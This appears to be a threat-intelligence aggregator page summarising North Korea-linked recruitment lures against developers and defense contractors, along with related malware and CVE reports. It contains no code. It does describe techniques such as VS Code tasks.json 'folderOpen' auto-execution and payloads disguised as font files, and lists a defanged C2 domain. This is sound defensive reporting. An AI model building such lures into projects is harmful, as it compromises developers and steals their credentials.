North Korea-linked Social Engineering Campaigns Targeting Developers and Defense Supply Chains
North Korea–aligned operators, including Lazarus (aka HIDDEN COBRA), are running multiple social-engineering-led intrusion campaigns aimed at stealing sensitive technology and establishing durable access. Reporting on Operation DreamJob describes fake job-offer lures used to compromise European drone manufacturers and defense contractors, with tooling and infrastructure designed to evade traditional defenses and support cyber-espionage against UAV-related intellectual property. Separately, a developer-focused operation dubbed “Fake Font” uses fake recruiter outreach and malicious GitHub repositories to trick engineers into opening projects that abuse Visual Studio Code automation (via .vscode/tasks.json) and disguised payloads (e.g., .woff2 “font” files) to execute multi-stage malware that ultimately deploys the InvisibleFerret Python backdoor for credential and crypto-wallet theft and long-term access.
A distinct DPRK-linked campaign reported by Darktrace targets South Korean users with spear-phishing that delivers a JSE script masquerading as an HWPX document and then abuses VS Code tunnels as a covert C2 channel over trusted Microsoft infrastructure, complicating detection in developer-heavy environments. Other items in the set describe unrelated activity: phishing abuse of Vercel to deliver remote-access tooling, exploitation of CVE-2025-51683 (blind SQLi) in the Mjobtime time-tracking app to reach MSSQL xp_cmdshell, a hospitality-focused DCRat campaign using ClickFix and MSBuild.exe, a generic CSS exfiltration technique write-up, and Trend Micro research on the PeckBirdy LOLBins framework used by China-aligned intrusion sets—none of which are part of the DPRK developer/defense recruitment-themed operations above.
Related Entities
Malware
Affected Products
Sources
Related Stories
North Korean Contagious Interview Campaign Uses Malicious VS Code Projects
North Korea-linked threat actors tied to the long-running **Contagious Interview** operation have been observed using **malicious Microsoft Visual Studio Code (VS Code) projects** as part of fake job-assessment lures, instructing targets to clone repositories from GitHub/GitLab/Bitbucket and open them in VS Code. The technique abuses VS Code `tasks.json` configuration—specifically `"runOn": "folderOpen"`—to trigger execution when a folder is opened, pulling staged payloads from attacker-controlled infrastructure (including Vercel-hosted domains) and ultimately deploying backdoors such as **BeaverTail** and **InvisibleFerret** that enable remote code execution and follow-on control. Recent iterations reportedly add multi-stage droppers embedded in task configuration content and disguised as benign files (e.g., spell-check dictionaries) to improve resilience if network retrieval fails, and include command-and-control behavior that can execute attacker-supplied JavaScript from a remote server (e.g., `ip-regions-check.vercel[.]app`). Separate reporting on North Korean APT trends indicates continued reliance on **fraudulent IT employment schemes** and recruitment-platform abuse to gain access to Western organizations, including long-term social engineering and persistent remote access via legitimate tools (e.g., *AnyDesk*, *Google Remote Desktop*) and VPN/location obfuscation. This broader pattern aligns with the same overarching tradecraft used in developer-targeted “interview” lures: leveraging hiring workflows and developer tooling to establish initial access and persistence while reducing suspicion, particularly in environments with remote-work infrastructure and developer workstations.
1 months ago
North Korea-Linked Threat Activity and Reporting on Lazarus, IT Worker Schemes, and Related Malware
Multiple reports and threat-intel posts highlighted **North Korea-linked cyber activity** spanning social engineering, malware, and broader ecosystem analysis. AllSecure described an attempted compromise of a CEO via a **fake LinkedIn job interview** attributed to **Lazarus** tradecraft (tagged *BeaverTail* / *Contagious Interview*), indicating continued use of recruiter-style lures and developer tooling themes (e.g., *VSCode*) to gain execution on target systems. Separately, eSentire published technical analysis on the **DEV#POPPER remote access trojan** and associated **OmniStealer** activity, framing it as DPRK-linked malware and providing defensive guidance for organizations facing this threat class. Additional DPRK-focused intelligence covered both strategic and operational dimensions. Google’s *Cloud Threat Horizons Report H1 2026* discussed cloud-focused threat activity and tracked DPRK-linked clusters (including **UNC4899** and **UNC5267**), while Logpresso published an OSINT report on **DPRK remote IT worker** infiltration tactics (fraudulent employment/contractor placement). NKInternet released a catalog-style overview of **North Korea’s software export ecosystem**, and RedAsgard’s “Hunting Lazarus” series contributed hands-on investigative detail into Lazarus operator artifacts. A separate Lazarus threat-actor profile page aggregated historical reporting and statistics, but did not add a discrete new incident beyond compilation.
4 days ago
North Korean Contagious Interview Campaign Targets Developers With Fake Recruiting Lures
Reporting describes **North Korea–linked “Contagious Interview” activity** in which attackers pose as recruiters and use fake job processes to compromise software developers. The operation uses deceptive LinkedIn personas and malicious “coding test” repositories to deliver malware (including **BeaverTail** and follow-on multi-platform backdoors/RATs), creating downstream **supply-chain risk** when victims run the code on corporate devices with privileged access. Separately, a real-world example of the same broader tactic was highlighted when an AI security firm’s CEO reported a **deepfake job applicant** and other red flags during a hiring process, reinforcing that adversaries are operationalizing identity fraud and synthetic media to increase the success rate of developer-focused intrusion attempts. The developer ecosystem continues to be a high-value target for initial access and credential theft, as shown by a separate incident in which a **malicious Open VSX extension** masquerading as an Angular language tool reached thousands of downloads and was reported to steal **GitHub/NPM credentials**, browser tokens, and crypto-wallet data while using resilient C2 techniques. In parallel, a high-severity CI/CD weakness was disclosed in the *Eclipse Theia* website repository (**CVE-2026-1699**), where a `pull_request_target` GitHub Actions workflow could allow untrusted PR code execution with access to repository secrets and broad `GITHUB_TOKEN` permissions—conditions that could enable package publishing, website tampering, or code pushes if exploited. Together, the activity underscores elevated risk around **developer hiring workflows, developer tooling marketplaces, and CI pipelines** as converging attack surfaces for credential theft and supply-chain compromise.
1 months ago